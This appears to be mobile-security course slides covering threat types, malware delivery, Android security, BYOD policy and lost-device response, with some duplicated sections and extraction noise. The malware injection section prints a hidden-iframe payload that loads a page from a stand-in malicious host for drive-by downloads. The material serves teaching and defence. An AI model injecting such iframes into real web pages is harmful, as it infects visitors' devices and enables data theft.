MOBILE THREATS AND ATTACKS Possible attack threats to mobile devices • Network exploit • Hackers takes advantage of vulnerability or flaw of user’s web browser on mobile device in WiFi communication to attack victims. • Hackers send malicious code/data from malicious logic websites to victim’s browser after user browses the malicious page and the malicious code will take over the control to get all sensitive data on the victim’s device. • Social engineering • Hackers use hyped contents to attract, manipulate, or persuade people into revealing confidential information through deception such as phishing for the purpose of information gathering, fraud, or access rights. Possible attack threats to mobile devices • Malware • Virus hosted on a legitimate code, replicable spread worms, Trojan horses with action in purpose • Misuse available resource and service • Email/SMS spam or denial of service (A group of the attacking devices send volume data to one targets on the Internet to impact the target’s services) Possible attack threats to mobile devices • Enterprise/private Data Loss • Work place data on a mobile device may be uploaded to home PC while synchronizing of entertainment downloading or Enterprise/private data loss due to stolen device • Data tamper • Intentionally modify/corrupt device data without the permission such as device’s contact list Best practices protecting mobile device from potential threats • Protect data loss due to mobile device loss with device ID • • • • and remotely remove all the apps, contacts, and confidential data right after the mobile phone is stolen or lost Type URL instead of copying/pasting or clicking links to protect mobile phones from drive-by download attacks Protect data privacy by data Encryption, don’t cache sensitive data Disable unnecessary device features such as Wi-Fi, Bluetooth, and infrared when they aren’t in use. Enabling the firewall, disable sharing Best practices protecting mobile device from potential threats • Isolate personal apps and corporate apps • Detect and Remove malware Apps • Download all mobile apps from trusted sources application providers and check the permission requests during installation • Install a mobile security application to protect the mobile device from attacks Mobile device security protection Strategies • • • • • Block the app’s attempt to act beyond granted permissions Access Control with ID and resource access permission requirement App signature: Each app is signed with the identity of its author and protect app from tampering Encryption: Encrypt data for data protection in case of device loss or theft Isolation: Restrict any app to access the sensitive data on a device. Each Android app runs in its own virtual machine (process) which does not allow any access to resource belong to other VM except special permission grant. Android’s Security • Android’s Security is supported by encryption, signature, Isolation, and access control security protection Strategies. However there still are vulnerabilities for Android mobile devices. • The Android app signature system is to ensure that the app’s logic is not tampered with, enforce a user to recognize the identity of the app’s author. Although Android will only install and run a signed app, a certificate is not required by Google. Hackers can still use anonymous digital certificates to sign their malware and distribute them without any certification by Google which is required by Apple. • A hacker can create and distribute malicious app since people will not be able to track down to the source and attackers add Trojan horses and malicious code to a existing legitimate app and then resign the updated version with an anonymous or fake certificate and distribute it. Its original digital signature is tempered and lost. Bring Your Own Device (BYOD) with Mobile Device Management (MDM) Enterprise BYOD policy: • Use MDM tools to oversee and control mobile devices in • • • • • • • • • secure operations Store enterprise data in sandbox Encrypte enterprise data on mobile devices Keep apps current with less vulnerabilities and flaws Routinely back up all apps and upgrade OS Authenticate and register all mobile devices with Secure Socket Layer (SSL) certificate Adopt app blacklisting within enterprise Management on the lost and stolen devices Separate personal and business accounts Controls user access Mobile Malware Security Solutions • Popular Mobile Malware(malicious software) are: • Spyware – steals user information with user’s consent somehow. • Trojan horse – steals confidential information such as credit card • Adware - displays unwanted pop-up ads with/without theft of sensitive data • There are some malware that just degrade or disrupt device operations such as rebooting device and exhausting device power without financial profit purpose. • Due to small screen size of mobile device most apps don’t show the URL address on the device screen while accessing web which takes even more difficult for mobile device user monitor and determine the destination of app on web. Common types of malware delivery mechanisms • Drive-by malware(silent Malware) • Drive-by malware delivers(downloads) itself onto a user’s devices without their consent and interaction by exploiting vulnerabilities of user browser via an invisible element such as HTML iframe tag element or by HTML embed element of image file. Such malware either tempts the victim to visit a infected website or send malware-infected messages (SMS). • Software updates • Malware invites users to update software ( turned out to be a malicious one) on social network or web sits. Common types of malware delivery mechanisms • Pop-up ads Adware lures users to click on an ad that directs user to download/install malicious code such as Trojan horse in a word or pdf file. The downloaded may also be The keylogger which monitors mouse operations or keyboard strokes to steal personal data. • Man-in-the-middle(MITM) Hacker may hijack a session by eavesdropping where the hacker makes independent connections with the victims and relays messages between two parties such that both parties thought they are talking directly to each other over. The MITM hacker intercepts all conversation and inject • Botnet One attacker controls a group of sites(devices) to send a large volume of traffic to a victim resulted in a denial of service (DoS) attack. Afterwards, the hacker Demands the victim a payment to stop the attack. Malware detection and protection solution • Filtering with blacklisting and whitelisting • Many search engines place malicious website a blocked list “blacklist.” The search engine will warn to potential visitor who intends access such sites on the list. A enterprise or a personal can also setup their own blacklist. A whitelist filter only only access to these on the list if a whitelist is exclusive. The filter techniques are widely used for spam email filtering. • View page source code Use Page Source (Firefox) or Source (IE) to view the actual source code to find out the injected malicious code Spyware detection techniques a. Static analysis Static analysis is a reverse engineering analysis approach to finding malicious characteristics code segments in an app without execution. The analysis focus on these obvious security threats which have been reported before. One lab in this module is given on the static analysis approach to detect spyware. b. Dynamic analysis Dynamic analysis will execute the suspicious mobile app in an isolated sandbox, such as a virtual machine or emulator to monitor and inspect the app’s dynamic behavior. c. c. App Permission analysis Android security uses permission to protect and detect by permissions in an Android mobile app’s intentions. The permissions are required to be clearly specified by app’s authors. Many spyware attacks make use of app’s vulnerability on the permission. b. Malware injection • Malware injection is the act of inserting malicious code into a vulnerable web server page with poor application input filtering such that their devices get infected with malware when users interact with such page via form or other GUI components. This injection can be detected by a filter deployed on web server to filter out invalid commands such as SQL injection commands. Malware injection works as: Malware injection 1. Inject a vulnerable website with malicious code that web browsers may request HTML: <iframe src=”http://www.malwebsite/malpage.html” width=”1″ height=”1″ style=”visibility: hidden”> </iframe> JavaScript(iframe is generated dynamically): <div style-“visibility:hidden: position:absolute: 1; top: 1”> <iframe src=”http://www.malwebsite.com/malpage.html” width=”1″ height=”1″ style=”visibility: hidden”> </iframe> </div> 2. Exploit and take over control the infected web browsers with this injected code, direct the exploited web browser to download malware to users' devices Once user browses the injected web page, the malicious content from Hop Point (a website controlled by the hacker) to execute inside the requested (and presumed legitimate) web page. The malware injection process instructed in “http://www.malwebsite.com/malpage.html” is loaded from here through the iframe to the browser itself which will install specific piece set of instructions for the browser to connect to a malicious site in order to download malware such as remote control utilities and backdoors as well as programs that automatically crawl the hard disk in search of information such as credit card details or bank accounts 3. Finally, the victim will Silently run this downloaded malware on user device Safeguards • Log on as a no-admin user • Secure your browser Set browser security to high to reject unwanted javascripts. Use Firefox with "no-script" to only run scripts from sites on whitelist • examine the application code and web server for evidence of: Injected Iframes, javascript, SQL Injection, objects such as flash, PDF Mobile device loss/Theft • Now, smart mobile device is not only for just calling or sending a message, it has become business and playing tool for us. • We’ve stored amount of personal data and even more sensitive important company data in the mobile device. These data may be exposed: Email exchanges could be seen; m-commence data such as online purchasing or banking transaction might be viewed; If the phone is connected via a VPN, company networks will be exposed to malware or could be hacked. • Americans lost about $30 billion worth of mobile phones last year. Phones may be lost anywhere and anytime. • Nearly all who found the lost phones tried to access the information on the phone, Mobile device loss/Theft • The loss of mobile device becomes a concern. About 2/3 of mobile device users feared not being able to recover lost content. • It is one of major focus of security concerns for Android mobile device. Some security experts have pointed out that targeting smartphones could potentially be more profitable for criminals than aiming at computers Action on Your Stolen Mobile Phone • Avoid data loss Quick restoration of all important data with a preinstalled autobackup app (e.g., WaveSecure, MyBackup) Install a mobile tracking app to protect our mobile device (Android Lost, Where’s My Droid) • Salvage Actions Report the loss/theft to your organization and/or mobile service provider immediately to deter malicious use of your device and minimize fraudulent charges. Change account credentials. If devices are used to access remote resources such as corporate networks or social networking sites, you should contact your enterprise or organization to revoke all credentials that were stored on the lost device, all issued certificates or change your password. revoke. Locking Smartphone is the first line of defense line for protection of preventing thieves from stealing broadband service such as SMS fees, reading your email, or abusing VPN connections. locates, locks and wipes. • Locates: Locate your lost device and display the location on a Google map. Register your Android device with one of the many available "find me" services to locate and recover lost devices • Locks: Remotely locks down your lost device, that nobody can use your phone without your access, even somebody else exchanges the SIM card on your phone. Use lock apps such as Norton Mobile or AppProtector or PIN/ passwords to lock your android devices. You can also enroll in a remote find/lock service. Enterprises can ensuring company devices using either Exchange ActiveSync or the Android 2.2 Device Admin to remotely enforce password policies and routinely lock these devices and reset passwords. • Wipes: Remotely wipe out important data which stored on your device. Some mobile service providers offer remote default and selective wiping, which allows you or your provider to remotely delete all data on the phone. Android’s Security • Android’s Security is supported by encryption, signature, Isolation, and access control security protection Strategies. However there still are vulnerabilities for Android mobile devices. • The Android app signature system is to ensure that the app’s logic is not tampered with, enforce a user to recognize the identity of the app’s author. Although Android will only install and run a signed app, a certificate is not required by Google. Hackers can still use anonymous digital certificates to sign their malware and distribute them without any certification by Google which is required by Apple. • A hacker can create and distribute malicious app since people will not be able to track down to the source and add Trojan horses and malicious code to a existing legitimate app and then re-sign the updated version with an anonymous or fake certificate and distribute it. Its original digital signature is tempered and lost. Mobile Device-Encryption • Android 2.2 does not support the encryption. There is no app can do full device encryption without Android OS support . • Google has designed Android 3.0 for mobile device and they have taken some steps for users and the enterprise. Android 3.0 comes loaded with full encryption support for data stored on the device. • We can still use some file encryption tools to protect our selected file and data. References A window into Mobile device security http://www.symantec.com/content/en/us/about/media/pdfs /symc_mobile_device_security_june2011.pdf http://www.continuitycentral.com/feature0919.html http://www.usatoday.com/tech/news/story/2012-0322/lost-phones/53707448/1] US-CERT Resource: Paul Ruggiero and Jon Foote, “Cyber Threats to Mobile Phones”, http://www.uscert.gov/reading_room/cyber_threats_to_mobile_phones. pdf) Top 10 android Security Riskshttp://www.esecurityplanet.com/views/article.php/39 28646/Top-10-Android-Security-Risks.htm